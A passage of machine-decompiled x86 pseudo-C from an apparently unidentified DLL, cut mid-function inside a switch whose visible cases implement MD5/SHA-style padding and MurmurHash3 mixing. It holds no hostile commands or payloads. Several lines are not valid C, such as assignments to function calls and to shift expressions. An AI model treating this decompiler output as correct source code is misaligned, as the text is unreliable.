                                                                      								if(__ebx >= 0x80) {
                                                                      									__edx = __esp[0xb];
                                                                      									__ebp = __edi + __eax;
                                                                      									 *__esp = 0x80;
                                                                      									if(0x80 >= 4) {
                                                                      										if((__ebp & 0x00000001) != 0) {
                                                                      											__eax =  *__edx & 0x000000ff;
                                                                      											__ebp = __ebp + 1;
                                                                      											 *(__ebp - 1) = __al;
                                                                      											__eax = __esp[0xb];
                                                                      											__edx = __esp[0xb] + 1;
                                                                      											__eax = 0x7f;
                                                                      											 *__esp = 0x7f;
                                                                      										}
                                                                      										if((__ebp & 0x00000002) != 0) {
                                                                      											__eax =  *__edx & 0x0000ffff;
                                                                      											__ebp = __ebp + 2;
                                                                      											__edx = __edx + 2;
                                                                      											 *(__ebp - 2) = __ax;
                                                                      											 *__esp =  *__esp - 2;
                                                                      										}
                                                                      										__eax =  *__esp;
                                                                      										if(__eax >= 4) {
                                                                      											__esp[2] = __esi;
                                                                      											__esp[1] = __eax;
                                                                      											__eax = 0;
                                                                      											__esp[3] = __ecx;
                                                                      											__esi = __esp[1];
                                                                      											do {
                                                                      												__ecx =  *(__eax + __edx);
                                                                      												 *(__eax + __ebp) =  *(__eax + __edx);
                                                                      												__eax = __eax + 4;
                                                                      											} while (__eax < __esi);
                                                                      											__esi = __esp[2];
                                                                      											__ebp = __eax + __ebp;
                                                                      											__edx = __eax + __edx;
                                                                      											__ecx = __esp[3];
                                                                      										}
                                                                      									}
                                                                      									__eax = 0;
                                                                      									if(( *__esp & 0x00000002) != 0) {
                                                                      										__eax =  *__edx & 0x0000ffff;
                                                                      										 *__ebp = __ax;
                                                                      										__eax = 2;
                                                                      										if(( *__esp & 0x00000001) != 0) {
                                                                      											goto L363;
                                                                      										}
                                                                      									} else {
                                                                      										if(( *__esp & 0x00000001) != 0) {
                                                                      											L363:
                                                                      											__edx =  *(__eax + __edx) & 0x000000ff;
                                                                      											 *(__eax + __ebp) = __dl;
                                                                      										}
                                                                      									}
                                                                      									 *__esp = __ecx;
                                                                      									__ebp = __edi + 0x90;
                                                                      									__edx = __edi + 0x10;
                                                                      									__ebp = E10041550(__ebp, __edi + 0x10);
                                                                      									__ecx =  *__esp;
                                                                      									__esp[0xb] = __esp[0xb] + __esi;
                                                                      									__eax = __esp[0xb];
                                                                      									__ebx =  *__esp + __ebx - 0x80;
                                                                      									__edx = __ebx;
                                                                      									__ebx = __ebx & 0x0000007f;
                                                                      									__edx = __edx & 0xffffff80;
                                                                      									__eax = __esp[0xb] + __edx;
                                                                      									if(__esp[0xb] >= __eax) {
                                                                      										__eax = 0x10;
                                                                      									} else {
                                                                      										__esp[0xc] = __ebx;
                                                                      										__esi = __esp[0xb];
                                                                      										 *__esp = __edx;
                                                                      										__ebx = __esp[0xb];
                                                                      										__esi = __eax;
                                                                      										do {
                                                                      											__edx = __ebx;
                                                                      											__ebp = E10041550(__ebp, __ebx);
                                                                      											__ebx = __ebx - 0xffffff80;
                                                                      										} while (__ebx < __esi);
                                                                      										__edx =  *__esp;
                                                                      										__eax = 0x10;
                                                                      										__ebx = __esp[0xc];
                                                                      										__esp[0xb] = __esp[0xb] +  *__esp;
                                                                      									}
                                                                      								}
                                                                      								__ecx = __edi + __eax;
                                                                      								__eax = __esp[0xb];
                                                                      								if(__ebx >= 4) {
                                                                      									if((__cl & 0x00000001) != 0) {
                                                                      										__edx =  *__eax & 0x000000ff;
                                                                      										__ecx = __ecx + 1;
                                                                      										__eax = __eax + 1;
                                                                      										__ebx = __ebx - 1;
                                                                      										 *(__ecx - 1) = __dl;
                                                                      									}
                                                                      									if((__cl & 0x00000002) != 0) {
                                                                      										__esi =  *__eax & 0x0000ffff;
                                                                      										__ecx = __ecx + 2;
                                                                      										__eax = __eax + 2;
                                                                      										__ebx = __ebx - 2;
                                                                      										 *(__ecx - 2) = __si;
                                                                      									}
                                                                      									if(__ebx >= 4) {
                                                                      										__edi = __ebx;
                                                                      										__edx = 0;
                                                                      										__edi = __ebx & 0xfffffffc;
                                                                      										do {
                                                                      											__esi =  *(__eax + __edx);
                                                                      											 *(__ecx + __edx) =  *(__eax + __edx);
                                                                      											__edx = __edx + 4;
                                                                      										} while (__edx < __edi);
                                                                      										__ecx = __ecx + __edx;
                                                                      										__eax = __eax + __edx;
                                                                      									}
                                                                      								}
                                                                      								__edx = 0;
                                                                      								if((__bl & 0x00000002) != 0) {
                                                                      									__edi =  *__eax & 0x0000ffff;
                                                                      									__edx = 2;
                                                                      									 *__ecx = __di;
                                                                      									if((__bl & 0x00000001) == 0) {
                                                                      										goto L346;
                                                                      									} else {
                                                                      										goto L347;
                                                                      									}
                                                                      								} else {
                                                                      									if((__bl & 0x00000001) != 0) {
                                                                      										L347:
                                                                      										__eax =  *(__eax + __edx) & 0x000000ff;
                                                                      										 *(__ecx + __edx) = __al;
                                                                      										__esp =  &(__esp[5]);
                                                                      										_pop(__ebx);
                                                                      										_pop(__esi);
                                                                      										_pop(__edi);
                                                                      										_pop(__ebp);
                                                                      										return __eax;
                                                                      									} else {
                                                                      										L346:
                                                                      										__esp =  &(__esp[5]);
                                                                      										_pop(__ebx);
                                                                      										_pop(__esi);
                                                                      										_pop(__edi);
                                                                      										_pop(__ebp);
                                                                      										return __eax;
                                                                      									}
                                                                      								}
                                                                      								goto L457;
                                                                      							case 0x1a:
                                                                      								__esp[3] = __ecx;
                                                                      								__esp[2] = __edx;
                                                                      								__eax =  *(__ebx + 0xc);
                                                                      								__esp[1] =  *(__ebx + 0xc);
                                                                      								__eax =  *(8 + __ebx);
                                                                      								 *__esp =  *(8 + __ebx);
                                                                      								__eax = E100101D0();
                                                                      								 *(__ebx + 0xc) = __eax;
                                                                      								__ebx = __esp[6];
                                                                      								__esp =  &(__esp[7]);
                                                                      								return __eax;
                                                                      								goto L457;
                                                                      							case 0x1b:
                                                                      								__esp[2] = __ecx;
                                                                      								__esp[1] = __edx;
                                                                      								__eax =  *(__ebx + 0xc);
                                                                      								 *__esp =  *(__ebx + 0xc);
                                                                      								__eax = E10001410();
                                                                      								 *(__ebx + 0xc) = __eax;
                                                                      								__ebx = __esp[6];
                                                                      								__esp =  &(__esp[7]);
                                                                      								return __eax;
                                                                      								goto L457;
                                                                      							case 0x1c:
                                                                      								__esp[2] = __ecx;
                                                                      								__esp[1] = __eax;
                                                                      								_push(__ebp);
                                                                      								_push(__edi);
                                                                      								__edi = 0x100b7204;
                                                                      								_push(__esi);
                                                                      								__esi = 1;
                                                                      								_push(__ebx);
                                                                      								__esp = __esp - 0x2c;
                                                                      								__ebx = __esp[0x10];
                                                                      								__eax =  *__ebx;
                                                                      								__edx =  *(__ebx + 4);
                                                                      								__esp[2] = 1;
                                                                      								__esp[1] = 0x100b7204;
                                                                      								 *__esp = __ebx;
                                                                      								__edx = ( *(__ebx + 4) << 0x00000020 | __eax) << 3;
                                                                      								__esp[9] = ( *(__ebx + 4) << 0x00000020 | __eax) << 3;
                                                                      								__esp[8] = __eax;
                                                                      								L98();
                                                                      								__esi =  *__ebx;
                                                                      								__edi =  *(__ebx + 4);
                                                                      								__esi = __esi & 0x0000003f;
                                                                      								if((__esi & 0x0000003f ^ 0x00000038) != 0) {
                                                                      									__ebp = __ebx + 0x48;
                                                                      									__esp[5] = __ebx + 0x48;
                                                                      									__ecx = 8 + __ebx;
                                                                      									__ebp = 8 + __ebx;
                                                                      									while(1) {
                                                                      										L134:
                                                                      										__eax = __esi;
                                                                      										__eax = __esi & 0x0000003f;
                                                                      										__esi = __esi + 1;
                                                                      										 *__ebx = __esi;
                                                                      										asm("adc edi, 0x0");
                                                                      										 *(__ebx + 4) = __edi;
                                                                      										if(__eax != 0) {
                                                                      											break;
                                                                      										}
                                                                      										__eax = __esp[5];
                                                                      										__ecx = 0;
                                                                      										__edx = 0x100b7206;
                                                                      										E10028070(__esp[5], 0, 0x100b7206) = __esi;
                                                                      										 *(8 + __ebx) = 0;
                                                                      										__esi & 0x0000003f = __esi & 0x0000003f ^ 0x00000038;
                                                                      										__eax = __esi & 0x0000003f ^ 0x00000038;
                                                                      										if((__esi & 0x0000003f ^ 0x00000038) != 0) {
                                                                      											continue;
                                                                      										}
                                                                      										goto L138;
                                                                      									}
                                                                      									 *(__eax + __ebp) = 0;
                                                                      									if(__eax == 0x3f) {
                                                                      										__edi = __esp[5];
                                                                      										__ecx = 1;
                                                                      										__edx = __ebp;
                                                                      										__edi = E10028070(__edi, 1, __ebp);
                                                                      										__ecx = 0;
                                                                      										__edx = 0x100b7207;
                                                                      										__edi = E10028070(__edi, 0, 0x100b7207);
                                                                      									}
                                                                      									__esi =  *__ebx;
                                                                      									__edi =  *(__ebx + 4);
                                                                      									__esi = __esi & 0x0000003f;
                                                                      									if((__esi & 0x0000003f ^ 0x00000038) != 0) {
                                                                      										goto L134;
                                                                      									}
                                                                      								}
                                                                      								L138:
                                                                      								 *__esp = __ebx;
                                                                      								__eax = 8;
                                                                      								__esp[2] = 8;
                                                                      								__eax =  &(__esp[8]);
                                                                      								__esp[1] =  &(__esp[8]);
                                                                      								L98();
                                                                      								__eax =  *(__ebx + 0x54);
                                                                      								__edi = __esp[0x11];
                                                                      								 *__edi =  *(__ebx + 0x54);
                                                                      								__eax =  *(__ebx + 0x50);
                                                                      								 *(__edi + 4) =  *(__ebx + 0x50);
                                                                      								__eax =  *(__ebx + 0x4c);
                                                                      								 *(__edi + 8) =  *(__ebx + 0x4c);
                                                                      								__eax =  *(__ebx + 0x48);
                                                                      								 *(__edi + 0xc) = __eax;
                                                                      								__esp =  &(__esp[0xb]);
                                                                      								_pop(__ebx);
                                                                      								_pop(__esi);
                                                                      								_pop(__edi);
                                                                      								_pop(__ebp);
                                                                      								return __eax;
                                                                      								goto L457;
                                                                      							case 0x1d:
                                                                      								__esp[2] = __ecx;
                                                                      								__esp[1] = __eax;
                                                                      								_push(__ebp);
                                                                      								_push(__edi);
                                                                      								_push(__esi);
                                                                      								_push(__ebx);
                                                                      								__esp = __esp - 0x1c;
                                                                      								__eax = __esp[0xc];
                                                                      								__edi = __esp[0xc];
                                                                      								__edx =  *(__eax + 4);
                                                                      								__eax =  *__eax;
                                                                      								__esp[3] = __edx;
                                                                      								__esp[2] = __eax;
                                                                      								__eax = __esp[0xc];
                                                                      								__edx =  *(__eax + 0xc);
                                                                      								__eax =  *(__eax + 8);
                                                                      								__esp[5] = __edx;
                                                                      								__edx = 0x10;
                                                                      								__esp[4] = __eax;
                                                                      								__eax = __esp[0xc];
                                                                      								__eax =  *(__esp[0xc] + 0x20);
                                                                      								__edi = __esp[0xc] + __eax + 0x10;
                                                                      								__edx = 0x10 - __eax;
                                                                      								if(0x10 >= 8) {
                                                                      									if((__edi & 0x00000001) != 0) {
                                                                      										 *__edi = 0;
                                                                      										__edx = __edx - 1;
                                                                      										__edi = __edi + 1;
                                                                      									}
                                                                      									if((__edi & 0x00000002) != 0) {
                                                                      										 *__edi = 0;
                                                                      										__edx = __edx - 2;
                                                                      										__edi = __edi + 2;
                                                                      									}
                                                                      									if((__edi & 0x00000004) != 0) {
                                                                      										 *__edi = 0;
                                                                      										__edx = __edx - 4;
                                                                      										__edi = __edi + 4;
                                                                      									}
                                                                      									__ecx = __edx;
                                                                      									__eax = 0;
                                                                      									__ecx = __edx >> 2;
                                                                      									__edx = __edx & 0x00000003;
                                                                      									__eax = memset(__edi, 0, __ecx << 2);
                                                                      									__edi = __edi + __ecx;
                                                                      									__ecx = 0;
                                                                      								}
                                                                      								if((__dl & 0x00000004) != 0) {
                                                                      									 *__edi = 0;
                                                                      									__edi = __edi + 4;
                                                                      								}
                                                                      								if((__dl & 0x00000002) != 0) {
                                                                      									 *__edi = 0;
                                                                      									__edi = __edi + 2;
                                                                      								}
                                                                      								if((__dl & 0x00000001) != 0) {
                                                                      									 *__edi = 0;
                                                                      								}
                                                                      								__eax = __esp[0xc];
                                                                      								__ebx = __esp[0xc];
                                                                      								__edi = __esp[3];
                                                                      								__eax =  *(0x10 + __esp[0xc]);
                                                                      								__ecx =  *(__esp[0xc] + 0x14) * 0x114253d5;
                                                                      								__ebx = 0x114253d5;
                                                                      								__edx = __eax * 0x87c37b91;
                                                                      								__ecx =  *(__esp[0xc] + 0x14) * 0x114253d5 + __eax * 0x87c37b91;
                                                                      								__edx = __eax * 0x114253d5 >> 0x20;
                                                                      								__eax = __eax * 0x114253d5;
                                                                      								__edx = __edx + __ecx;
                                                                      								__ecx = __eax;
                                                                      								__eax = (__eax << 0x00000020 | __edx) << 0x1f;
                                                                      								__edx = (__edx << 0x00000020 | __ecx) << 0x1f;
                                                                      								__ebx = __eax;
                                                                      								__eax = __esp[0xc];
                                                                      								__esi = __edx;
                                                                      								__ecx = __esp[2];
                                                                      								__edx =  *(__eax + 0x2c);
                                                                      								__eax =  *(__eax + 0x28);
                                                                      								__esp[1] = __edx;
                                                                      								__edx = __edx ^ __esp[3];
                                                                      								 *__esp = __eax;
                                                                      								__ebp = __edx;
                                                                      								__eax = __eax ^ __esp[2];
                                                                      								__edx = __ebx * 0x4cf5ad43;
                                                                      								__edi = __eax;
                                                                      								__ecx = __esi * 0x2745937f;
                                                                      								__esi = 0x114253d5;
                                                                      								__eax = __ecx + __ebx * 0x4cf5ad43;
                                                                      								__ecx = 0x2745937f;
                                                                      								__esp[2] = __eax;
                                                                      								__eax = __ebx;
                                                                      								__edx = __eax * 0x2745937f >> 0x20;
                                                                      								__eax = __eax * 0x2745937f;
                                                                      								__ebx = __esp[2];
                                                                      								__eax = __eax ^ __edi;
                                                                      								__edx = __esp[2] + __edx;
                                                                      								__ebx = __esp[0xc];
                                                                      								__esp[2] = __eax;
                                                                      								__eax = __esp[0xc];
                                                                      								__esp[3] = __edx;
                                                                      								__edi =  *__esp;
                                                                      								__ebp = __esp[1];
                                                                      								__ecx =  *(__esp[0xc] + 0x1c) * 0x2745937f;
                                                                      								__eax =  *(__esp[0xc] + 0x18);
                                                                      								__ebx = __esp[5];
                                                                      								__edx = __eax * 0x4cf5ad43;
                                                                      								__ebp = __esp[1] ^ __esp[5];
                                                                      								__ecx =  *(__esp[0xc] + 0x1c) * 0x2745937f + __eax * 0x4cf5ad43;
                                                                      								__edx = 0x2745937f;
                                                                      								__edx = __eax * 0x2745937f >> 0x20;
                                                                      								__eax = __eax * 0x2745937f;
                                                                      								__edx = __edx + __ecx;
                                                                      								__ecx = __eax;
                                                                      								 *__esp = __eax;
                                                                      								__edx = (__ecx << 0x00000020 | __edx) >> 0x1f;
                                                                      								__ecx = __esp[4];
                                                                      								__eax =  *__esp;
                                                                      								__edi =  *__esp ^ __esp[4];
                                                                      								__ecx =  *__esp ^ __esp[4];
                                                                      								__edi = __edx * 0x114253d5;
                                                                      								__edx =  *__esp * 0x87c37b91;
                                                                      								__edi = __edi +  *__esp * 0x87c37b91;
                                                                      								__edx = __eax * 0x114253d5 >> 0x20;
                                                                      								__eax = __eax * 0x114253d5;
                                                                      								__esi = __esp[2];
                                                                      								__edx = __edi + __edx;
                                                                      								__edi = __esp[3];
                                                                      								__eax = __eax ^  *__esp ^ __esp[4];
                                                                      								__edx = __edx ^ __esp[1] ^ __esp[5];
                                                                      								__esi = __esp[2] + __eax;
                                                                      								__ebp = 0x1a85ec53;
                                                                      								asm("adc edi, edx");
                                                                      								__eax = __eax + __esi;
                                                                      								asm("adc edx, edi");
                                                                      								__ecx = __eax;
                                                                      								__eax = __edi;
                                                                      								__ebx = __edx;
                                                                      								__eax = __edi >> 1;
                                                                      								__edx = 0;
                                                                      								__eax = __edi >> 0x00000001 ^ __esi;
                                                                      								__edx = 0 ^ __edi;
                                                                      								__esi = (0 ^ __edi) * 0xed558ccd;
                                                                      								__edi = __eax;
                                                                      								__edx = __eax * 0xff51afd7;
                                                                      								__eax = 0xed558ccd;
                                                                      								__esi = __esi + __edx;
                                                                      								__edx = 0xed558ccd * __edi >> 0x20;
                                                                      								__eax = 0xed558ccd * __edi;
                                                                      								__edi = 0;
                                                                      								__edx = __esi + __edx;
                                                                      								__esi = __edx;
                                                                      								__edx = __edx ^ 0;
                                                                      								 *__esp = __eax;
                                                                      								__esi = __edx * 0x1a85ec53;
                                                                      								__eax =  *__esp;
                                                                      								__edx =  *__esp * 0xc4ceb9fe;
                                                                      								__edi = __esi + __edx;
                                                                      								__esp[2] = __esi + __edx;
                                                                      								__edx = __eax * 0x1a85ec53 >> 0x20;
                                                                      								__eax = __eax * 0x1a85ec53;
                                                                      								__edi = __edx;
                                                                      								__edx = __esp[2];
                                                                      								__esi = __eax;
                                                                      								__edi = __edi + __esp[2];
                                                                      								__edx = __edi;
                                                                      								__eax = __edi;
                                                                      								__edx = 0;
                                                                      								__esp[3] = 0;
                                                                      								__eax = __edi >> 1;
                                                                      								__edx = __ebx;
                                                                      								__esp[2] = __edi >> 1;
                                                                      								__eax = __ebx;
                                                                      								__edx = 0;
                                                                      								__eax = __ebx >> 1;
                                                                      								__edx = 0 ^ __ebx;
                                                                      								__ebx = (0 ^ __ebx) * 0xed558ccd;
                                                                      								 *__esp = __eax;
                                                                      								__ecx = 0xed558ccd;
                                                                      								__edx =  *__esp * 0xff51afd7;
                                                                      								__eax =  *__esp;
                                                                      								__ebx = __ebx +  *__esp * 0xff51afd7;
                                                                      								__edx = __eax * 0xed558ccd >> 0x20;
                                                                      								__eax = __eax * 0xed558ccd;
                                                                      								__edx = __edx + __ebx;
                                                                      								__ebx = __edx;
                                                                      								__ecx = __edx;
                                                                      								__ebx = 0;
                                                                      								__edx >> 1 = __edx >> 0x00000001 ^ __eax;
                                                                      								__ebx = 0 ^ __edx;
                                                                      								 *__esp = __edx >> 0x00000001 ^ __eax;
                                                                      								__edx = __ebx;
                                                                      								__eax =  *__esp * 0xc4ceb9fe;
                                                                      								__esp[1] = __ebx;
                                                                      								__ebx = __ebx * 0x1a85ec53;
                                                                      								__ebx = __ebx +  *__esp * 0xc4ceb9fe;
                                                                      								__eax =  *__esp;
                                                                      								__edx = __eax * 0x1a85ec53 >> 0x20;
                                                                      								__eax = __eax * 0x1a85ec53;
                                                                      								__edx = __edx + __ebx;
                                                                      								__ebx = 0;
                                                                      								__ecx = __edx;
                                                                      								__edx = __edx ^ 0;
                                                                      								__ebx = __esp[3];
                                                                      								__eax = __eax ^ __ecx;
                                                                      								__ecx = __esp[2];
                                                                      								__ebx = __edi;
                                                                      								__edi = __esp[0xd];
                                                                      								__esi = __esi ^ __esp[2];
                                                                      								__ecx = __esi;
                                                                      								__ecx = __esi + __eax;
                                                                      								 *__edi = __ecx;
                                                                      								asm("adc ebx, edx");
                                                                      								__ecx = __eax + __ecx;
                                                                      								 *(__edi + 4) = __ebx;
                                                                      								asm("adc ebx, edx");
                                                                      								 *(__edi + 8) = __ecx;
                                                                      								 *(__edi + 0xc) = __ebx;
                                                                      								__esp =  &(__esp[7]);
                                                                      								_pop(__ebx);
                                                                      								_pop(__esi);
                                                                      								_pop(__edi);
                                                                      								_pop(__ebp);
                                                                      								return __eax;
                                                                      								goto L457;
                                                                      							case 0x1e:
                                                                      								__esp[2] = __ecx;
                                                                      								__esp[1] = __eax;
                                                                      								_push(__edi);
                                                                      								__edi = 1;
                                                                      								_push(__esi);
                                                                      								_push(__ebx);
                                                                      								__esp = __esp - 0x20;
                                                                      								__esi = __esp[0xc];
                                                                      								__ebx = __esp[0xd];
                                                                      								__eax =  *(__esi + 8);
                                                                      								__edx =  *(__esi + 0xc);
                                                                      								__esp[2] = 1;
                                                                      								__edi = __esi + 0x10;
                                                                      								 *__esp = __esi;
                                                                      								__edx = ( *(__esi + 0xc) << 0x00000020 | __eax) << 3;
                                                                      								__esp[7] = ( *(__esi + 0xc) << 0x00000020 | __eax) << 3;
                                                                      								__esp[6] = __eax;
                                                                      								__eax = 0x100bf9a0;
                                                                      								__esp[1] = 0x100bf9a0;
                                                                      								L237();
                                                                      								__eax =  *(__esi + 8);
                                                                      								__edx =  *(__esi + 0xc);
                                                                      								__eax = __eax & 0x0000003f;
                                                                      								if((__eax & 0x0000003f ^ 0x00000038) != 0) {
                                                                      									do {
                                                                      										__ecx = __eax;
                                                                      										__ecx = __eax & 0x0000003f;
                                                                      										 *(__esi + 8) = __eax;
                                                                      										asm("adc edx, 0x0");
                                                                      										 *(__esi + 0xc) = __edx;
                                                                      										if(__ecx != 0x3f) {
                                                                      											 *((char*)(__esi + 0x10 + __ecx)) = 0;
                                                                      										} else {
                                                                      											 *((char*)(__esi + 0x4f)) = 0;
                                                                      											__eax = __esi + 0x50;
                                                                      											__esp[1] = __edi;
                                                                      											 *__esp = __esi + 0x50;
                                                                      											__eax =  *((intOrPtr*)(__esi + 0x78))();
                                                                      										}
                                                                      										__eax =  *(__esi + 8);
                                                                      										__edx =  *(__esi + 0xc);
                                                                      										__eax = __eax & 0x0000003f;
                                                                      									} while ((__eax & 0x0000003f ^ 0x00000038) != 0);
                                                                      								}
                                                                      								 *__esp = __esi;
                                                                      								__eax = 8;
                                                                      								__esp[2] = 8;
                                                                      								__eax =  &(__esp[6]);
                                                                      								__esp[1] = __eax;
                                                                      								L237();
                                                                      								if( *__esi != 0) {
                                                                      									__eax =  *(__esi + 0x50);
                                                                      									 *__ebx = __eax;
                                                                      									if( *__esi > 1) {
                                                                      										__eax =  *(__esi + 0x54);
                                                                      										 *(__ebx + 4) = __eax;
                                                                      										if( *__esi > 2) {
                                                                      											__eax =  *(__esi + 0x58);
                                                                      											 *(8 + __ebx) = __eax;
                                                                      											if( *__esi > 3) {
                                                                      												__eax =  *(__esi + 0x5c);
                                                                      												 *(__ebx + 0xc) = __eax;
                                                                      												if( *__esi > 4) {
                                                                      													__eax =  *(__esi + 0x60);
                                                                      													 *(0x10 + __ebx) = __eax;
                                                                      													if( *__esi > 5) {
                                                                      														__eax =  *(__esi + 0x64);
                                                                      														 *(__ebx + 0x14) = __eax;
                                                                      														if( *__esi > 6) {
                                                                      															__eax =  *(__esi + 0x68);
                                                                      															 *(__ebx + 0x18) = __eax;
                                                                      															if( *__esi > 7) {
                                                                      																__eax =  *(__esi + 0x6c);
                                                                      																 *(__ebx + 0x1c) = __eax;
                                                                      																if( *__esi > 8) {
                                                                      																	__eax =  *(__esi + 0x70);
                                                                      																	 *(__ebx + 0x20) = __eax;
                                                                      																	if( *__esi > 9) {
                                                                      																		__eax =  *(__esi + 0x74);
                                                                      																		 *(__ebx + 0x24) = __eax;
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								__esp =  &(__esp[8]);
                                                                      								_pop(__ebx);
                                                                      								_pop(__esi);
                                                                      								_pop(__edi);
                                                                      								return __eax;
                                                                      								goto L457;
                                                                      							case 0x1f:
                                                                      								__esp[2] = __ecx;
                                                                      								__esp[1] = __eax;
                                                                      								_push(__ebp);
                                                                      								_push(__edi);
                                                                      								__edi = 1;
                                                                      								_push(__esi);
                                                                      								_push(__ebx);
                                                                      								__esp = __esp - 0x2c;
                                                                      								__esi = __esp[0x10];
                                                                      								__ebx = __esp[0x11];
                                                                      								__eax =  *(__esi + 8);
                                                                      								__edx =  *(__esi + 0xc);
                                                                      								__esp[2] = 1;
                                                                      								__edi = __esi + 0x10;
                                                                      								 *__esp = __esi;
                                                                      								__edx = ( *(__esi + 0xc) << 0x00000020 | __eax) << 3;
                                                                      								__eax = __eax << 3;
                                                                      								__ebp = __edx;
                                                                      								__edx = __eax;
                                                                      								__eax = __ebp;
                                                                      								__ebp = 0x100bfae0;
                                                                      								asm("bswap edx");
                                                                      								asm("bswap eax");
                                                                      								__esp[1] = 0x100bfae0;
                                                                      								__esp[6] = __eax;
                                                                      								__esp[7] = __edx;
                                                                      								L290();
                                                                      								__eax =  *(__esi + 8);
                                                                      								__edx =  *(__esi + 0xc);
                                                                      								__eax = __eax & 0x0000003f;
                                                                      								if((__eax & 0x0000003f ^ 0x00000038) != 0) {
                                                                      									do {
                                                                      										__ecx = __eax;
                                                                      										__ecx = __eax & 0x0000003f;
                                                                      										 *(__esi + 8) = __eax;
                                                                      										asm("adc edx, 0x0");
                                                                      										 *(__esi + 0xc) = __edx;
                                                                      										if(__ecx != 0x3f) {
                                                                      											 *((char*)(__esi + 0x10 + __ecx)) = 0;
                                                                      										} else {
                                                                      											 *((char*)(__esi + 0x4f)) = 0;
                                                                      											__eax = __esi + 0x50;
                                                                      											__esp[1] = __edi;
                                                                      											 *__esp = __esi + 0x50;
                                                                      											__eax =  *(__esi + 0x70)();
                                                                      										}
                                                                      										__eax =  *(__esi + 8);
                                                                      										__edx =  *(__esi + 0xc);
                                                                      										__eax = __eax & 0x0000003f;
                                                                      									} while ((__eax & 0x0000003f ^ 0x00000038) != 0);
                                                                      								} else {
                                                                      								}
                                                                      								 *__esp = __esi;
                                                                      								__eax = 8;
                                                                      								__esp[2] = 8;
                                                                      								__eax =  &(__esp[6]);
                                                                      								__esp[1] = __eax;
                                                                      								L290();
                                                                      								if( *__esi != 0) {
                                                                      									__eax =  *(__esi + 0x50);
                                                                      									asm("bswap eax");
                                                                      									 *__ebx = __eax;
                                                                      									if( *__esi > 1) {
                                                                      										__eax =  *(__esi + 0x54);
                                                                      										asm("bswap eax");
                                                                      										 *(__ebx + 4) = __eax;
                                                                      										if( *__esi > 2) {
                                                                      											__eax =  *(__esi + 0x58);
                                                                      											asm("bswap eax");
                                                                      											 *(8 + __ebx) = __eax;
                                                                      											if( *__esi > 3) {
                                                                      												__eax =  *(__esi + 0x5c);
                                                                      												asm("bswap eax");
                                                                      												 *(__ebx + 0xc) = __eax;
                                                                      												if( *__esi > 4) {
                                                                      													__eax =  *(__esi + 0x60);
                                                                      													asm("bswap eax");
                                                                      													 *(0x10 + __ebx) = __eax;
                                                                      													if( *__esi > 5) {
                                                                      														__eax =  *(__esi + 0x64);
                                                                      														asm("bswap eax");
                                                                      														 *(__ebx + 0x14) = __eax;
                                                                      														if( *__esi > 6) {
                                                                      															__eax =  *(__esi + 0x68);
                                                                      															asm("bswap eax");
                                                                      															 *(__ebx + 0x18) = __eax;
                                                                      															if( *__esi > 7) {
                                                                      																__eax =  *(__esi + 0x6c);
                                                                      																asm("bswap eax");
                                                                      																 *(__ebx + 0x1c) = __eax;
                                                                      																if( *__esi > 8) {
                                                                      																	__eax =  *(__esi + 0x70);
                                                                      																	asm("bswap eax");
                                                                      																	 *(__ebx + 0x20) = __eax;
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								__esp =  &(__esp[0xb]);
                                                                      								_pop(__ebx);
                                                                      								_pop(__esi);
                                                                      								_pop(__edi);
                                                                      								_pop(__ebp);
                                                                      								return __eax;
                                                                      								goto L457;
                                                                      							case 0x20:
                                                                      								__esp[2] = __ecx;
                                                                      								__esp[1] = __eax;
                                                                      								_push(__ebp);
                                                                      								__eax = 0;
                                                                      								_push(__edi);
                                                                      								__edx = 0;
                                                                      								_push(__esi);
                                                                      								_push(__ebx);
                                                                      								__esp = __esp - 0x1c;
                                                                      								__esp[2] = 0;
                                                                      								__ebx = __esp[0xc];
                                                                      								__esp[3] = 0;
                                                                      								__eax =  *(8 + __ebx);
                                                                      								__edx =  *(__ebx + 0xc);
                                                                      								__eax = __eax << 3;
                                                                      								__edi = __edx;
                                                                      								__edi = (__edx << 0x00000020 | __eax) << 3;
                                                                      								__ecx = __eax << 3;
                                                                      								asm("bswap ecx");
                                                                      								__esp[5] = __eax << 3;
                                                                      								__ecx = __eax;
                                                                      								__ecx = __eax & 0x0000007f;
                                                                      								 *(8 + __ebx) = __eax;
                                                                      								asm("adc edx, 0x0");
                                                                      								__esi = __edi;
                                                                      								asm("bswap esi");
                                                                      								 *(__ebx + 0xc) = __edx;
                                                                      								__esp[4] = __edi;
                                                                      								if(__ecx == 0x7f) {
                                                                      									 *((char*)(__ebx + 0x8f)) = 0x80;
                                                                      									__edx = 0x10 + __ebx;
                                                                      									__esi = 0x100bfae9;
                                                                      									__ebx + 0x90 = E10041550(__ebx + 0x90, 0x10 + __ebx);
                                                                      									__edx = 0x10;
                                                                      									__ecx = 0;
                                                                      								} else {
                                                                      									__edx = 0x10 + __ecx;
                                                                      									__esi = 0x100bfae8;
                                                                      									__ecx = 1;
                                                                      								}
                                                                      								__edx = __edx + __ebx;
                                                                      								if(__ecx != 0) {
                                                                      									__eax = 0;
                                                                      									__edi = __ebx;
                                                                      									do {
                                                                      										__ebx =  *(__esi + __eax) & 0x000000ff;
                                                                      										 *(__eax + __edx) = __bl;
                                                                      										__eax = __eax + 1;
                                                                      									} while (__eax < __ecx);
                                                                      									__ebx = __edi;
                                                                      								}
                                                                      								__esi =  *(8 + __ebx);
                                                                      								__edi =  *(__ebx + 0xc);
                                                                      								__esi = __esi & 0x0000007f;
                                                                      								if((__esi & 0x0000007f ^ 0x00000070) != 0) {
                                                                      									__ebp = 0x10 + __ebx;
                                                                      									while(1) {
                                                                      										L386:
                                                                      										__eax = __esi;
                                                                      										__eax = __esi & 0x0000007f;
                                                                      										__esi = __esi + 1;
                                                                      										 *(8 + __ebx) = __esi;
                                                                      										asm("adc edi, 0x0");
                                                                      										 *(__ebx + 0xc) = __edi;
                                                                      										if(__eax == 0x7f) {
                                                                      											break;
                                                                      										}
                                                                      										 *((char*)(__ebx + __eax + 0x10)) = 0;
                                                                      										__esi =  *(8 + __ebx);
                                                                      										__edi =  *(__ebx + 0xc);
                                                                      										__esi = __esi & 0x0000007f;
                                                                      										if((__esi & 0x0000007f ^ 0x00000070) != 0) {
                                                                      											continue;
                                                                      										}
                                                                      										goto L388;
                                                                      									}
                                                                      									 *((char*)(__ebx + 0x8f)) = 0;
                                                                      									__eax = __ebx + 0x90;
